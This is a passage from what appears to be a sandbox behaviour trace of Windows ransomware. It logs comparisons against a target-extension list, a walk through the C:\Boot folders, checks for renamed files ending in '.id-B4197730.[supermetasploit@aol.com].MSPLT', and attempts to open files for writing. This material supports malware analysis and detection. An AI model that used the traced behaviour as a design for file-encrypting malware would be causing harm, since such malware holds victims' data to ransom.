-1 [0286.054] lstrlenW (lpString=".bz2") returned 4 [0286.054] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString=".7z") returned 3 [0286.054] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.054] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.054] lstrlenW (lpString=".dbf") returned 4 [0286.054] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.054] lstrlenW (lpString=".1cd") returned 4 [0286.054] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.054] lstrlenW (lpString=".jpg") returned 4 [0286.054] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.054] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.054] lstrlenW (lpString=".doc") returned 4 [0286.054] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString=".docx") returned 5 [0286.054] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.055] lstrlenW (lpString=".pdf") returned 4 [0286.055] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.055] lstrlenW (lpString=".xls") returned 4 [0286.055] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.055] lstrlenW (lpString=".xlsx") returned 5 [0286.055] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.055] lstrlenW (lpString=".ppt") returned 4 [0286.055] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.055] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.055] lstrlenW (lpString=".zip") returned 4 [0286.055] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.055] lstrlenW (lpString=".rar") returned 4 [0286.055] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.055] lstrlenW (lpString=".bz2") returned 4 [0286.055] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.055] lstrlenW (lpString=".7z") returned 3 [0286.055] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.055] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.055] lstrlenW (lpString=".dbf") returned 4 [0286.055] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.055] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.055] lstrlenW (lpString=".1cd") returned 4 [0286.055] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.055] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.055] lstrlenW (lpString=".jpg") returned 4 [0286.055] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.055] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.055] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0286.055] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.056] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=49091) returned 1 [0286.056] CloseHandle (hObject=0x3e4) returned 1 [0286.056] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0286.056] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.056] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.056] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0286.056] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0286.056] lstrlenW (lpString=".doc") returned 4 [0286.056] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.057] lstrlenW (lpString=".docx") returned 5 [0286.057] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.057] lstrlenW (lpString=".pdf") returned 4 [0286.057] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.057] lstrlenW (lpString=".xls") returned 4 [0286.057] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.057] lstrlenW (lpString=".xlsx") returned 5 [0286.057] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.057] lstrlenW (lpString=".ppt") returned 4 [0286.057] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.057] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0286.057] lstrlenW (lpString=".zip") returned 4 [0286.057] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.057] lstrlenW (lpString=".rar") returned 4 [0286.057] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.057] lstrlenW (lpString=".bz2") returned 4 [0286.057] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.057] lstrlenW (lpString=".7z") returned 3 [0286.057] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.057] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0286.058] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.058] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.058] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=79200) returned 1 [0286.058] CloseHandle (hObject=0x3e4) returned 1 [0286.059] GetFileAttributesW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui")) returned 0x20 [0286.059] GetFileAttributesW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.059] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.059] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.059] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.060] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=79192) returned 1 [0286.060] CloseHandle (hObject=0x3e4) returned 1 [0286.060] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0286.060] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.060] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.061] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.061] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.061] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=45984) returned 1 [0286.061] CloseHandle (hObject=0x3e4) returned 1 [0286.061] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui")) returned 0x20 [0286.061] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.061] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.062] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.062] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.062] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=76640) returned 1 [0286.062] CloseHandle (hObject=0x3e4) returned 1 [0286.062] GetFileAttributesW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui")) returned 0x20 [0286.062] GetFileAttributesW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.062] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.063] Sleep (dwMilliseconds=0x64) [0286.300] Sleep (dwMilliseconds=0x64) [0286.454] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.454] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.454] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.454] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=66912) returned 1 [0286.454] CloseHandle (hObject=0x348) returned 1 [0286.455] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0286.455] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.455] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.455] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.455] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.455] lstrlenW (lpString=".doc") returned 4 [0286.455] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.455] lstrlenW (lpString=".docx") returned 5 [0286.455] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.455] lstrlenW (lpString=".pdf") returned 4 [0286.455] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.455] lstrlenW (lpString=".xls") returned 4 [0286.455] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.455] lstrlenW (lpString=".xlsx") returned 5 [0286.456] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.456] lstrlenW (lpString=".ppt") returned 4 [0286.456] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.456] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.456] lstrlenW (lpString=".zip") returned 4 [0286.456] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.456] lstrlenW (lpString=".rar") returned 4 [0286.456] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.456] lstrlenW (lpString=".bz2") returned 4 [0286.456] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.456] lstrlenW (lpString=".7z") returned 3 [0286.456] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.456] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.456] lstrlenW (lpString=".dbf") returned 4 [0286.456] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.456] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.456] lstrlenW (lpString=".1cd") returned 4 [0286.456] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.456] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.456] lstrlenW (lpString=".jpg") returned 4 [0286.456] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.456] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.457] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.457] lstrlenW (lpString=".doc") returned 4 [0286.457] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.457] lstrlenW (lpString=".docx") returned 5 [0286.457] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.457] lstrlenW (lpString=".pdf") returned 4 [0286.457] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.457] lstrlenW (lpString=".xls") returned 4 [0286.457] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.457] lstrlenW (lpString=".xlsx") returned 5 [0286.457] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.457] lstrlenW (lpString=".ppt") returned 4 [0286.457] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.457] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.457] lstrlenW (lpString=".zip") returned 4 [0286.457] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.457] lstrlenW (lpString=".rar") returned 4 [0286.457] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.457] lstrlenW (lpString=".bz2") returned 4 [0286.457] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.457] lstrlenW (lpString=".7z") returned 3 [0286.458] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.458] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.458] lstrlenW (lpString=".dbf") returned 4 [0286.458] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.458] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.458] lstrlenW (lpString=".1cd") returned 4 [0286.458] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.458] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0286.458] lstrlenW (lpString=".jpg") returned 4 [0286.458] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.458] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.458] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.458] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.459] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=42912) returned 1 [0286.459] CloseHandle (hObject=0x348) returned 1 [0286.459] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui")) returned 0x20 [0286.459] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.459] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.460] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.460] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.460] lstrlenW (lpString=".doc") returned 4 [0286.460] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.460] lstrlenW (lpString=".docx") returned 5 [0286.460] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.460] lstrlenW (lpString=".pdf") returned 4 [0286.460] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.460] lstrlenW (lpString=".xls") returned 4 [0286.460] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.460] lstrlenW (lpString=".xlsx") returned 5 [0286.460] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.460] lstrlenW (lpString=".ppt") returned 4 [0286.460] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.460] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.460] lstrlenW (lpString=".zip") returned 4 [0286.460] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.460] lstrlenW (lpString=".rar") returned 4 [0286.460] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.460] lstrlenW (lpString=".bz2") returned 4 [0286.460] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.460] lstrlenW (lpString=".7z") returned 3 [0286.460] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.460] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.460] lstrlenW (lpString=".dbf") returned 4 [0286.460] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.460] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.461] lstrlenW (lpString=".1cd") returned 4 [0286.461] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.461] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.461] lstrlenW (lpString=".jpg") returned 4 [0286.461] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.461] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.461] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.461] lstrlenW (lpString=".doc") returned 4 [0286.461] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.461] lstrlenW (lpString=".docx") returned 5 [0286.461] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.461] lstrlenW (lpString=".pdf") returned 4 [0286.461] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.461] lstrlenW (lpString=".xls") returned 4 [0286.461] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.461] lstrlenW (lpString=".xlsx") returned 5 [0286.461] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.461] lstrlenW (lpString=".ppt") returned 4 [0286.461] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.461] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.461] lstrlenW (lpString=".zip") returned 4 [0286.461] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.461] lstrlenW (lpString=".rar") returned 4 [0286.461] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.461] lstrlenW (lpString=".bz2") returned 4 [0286.461] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.461] lstrlenW (lpString=".7z") returned 3 [0286.461] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.461] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.461] lstrlenW (lpString=".dbf") returned 4 [0286.462] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.462] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.462] lstrlenW (lpString=".1cd") returned 4 [0286.462] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.462] lstrlenW (lpString="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 29 [0286.462] lstrlenW (lpString=".jpg") returned 4 [0286.462] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.462] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.462] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.462] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.465] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=75616) returned 1 [0286.465] CloseHandle (hObject=0x348) returned 1 [0286.465] GetFileAttributesW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui")) returned 0x20 [0286.466] GetFileAttributesW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.466] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.466] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.466] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.466] lstrlenW (lpString=".doc") returned 4 [0286.466] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.466] lstrlenW (lpString=".docx") returned 5 [0286.466] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.466] lstrlenW (lpString=".pdf") returned 4 [0286.466] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.466] lstrlenW (lpString=".xls") returned 4 [0286.466] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.466] lstrlenW (lpString=".xlsx") returned 5 [0286.466] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.466] lstrlenW (lpString=".ppt") returned 4 [0286.466] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.466] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.466] lstrlenW (lpString=".zip") returned 4 [0286.466] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.466] lstrlenW (lpString=".rar") returned 4 [0286.466] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.466] lstrlenW (lpString=".bz2") returned 4 [0286.467] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.467] lstrlenW (lpString=".7z") returned 3 [0286.467] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.467] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.467] lstrlenW (lpString=".dbf") returned 4 [0286.467] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.467] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.467] lstrlenW (lpString=".1cd") returned 4 [0286.467] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.467] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.467] lstrlenW (lpString=".jpg") returned 4 [0286.467] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.467] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.467] lstrlenW (lpString="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 29 [0286.467] lstrlenW (lpString=".doc") returned 4 [0286.467] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.467] lstrlenW (lpString=".docx") returned 5 [0286.467] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.467] lstrlenW (lpString=".pdf") returned 4 [0286.467] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.467] lstrlenW (lpString=".xls") returned 4 [0286.467] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.467] lstrlenW (lpString=".xlsx") returned 5 [0286.468] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.468] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=75608) returned 1 [0286.468] CloseHandle (hObject=0x348) returned 1 [0286.468] GetFileAttributesW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui")) returned 0x20 [0286.468] GetFileAttributesW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff 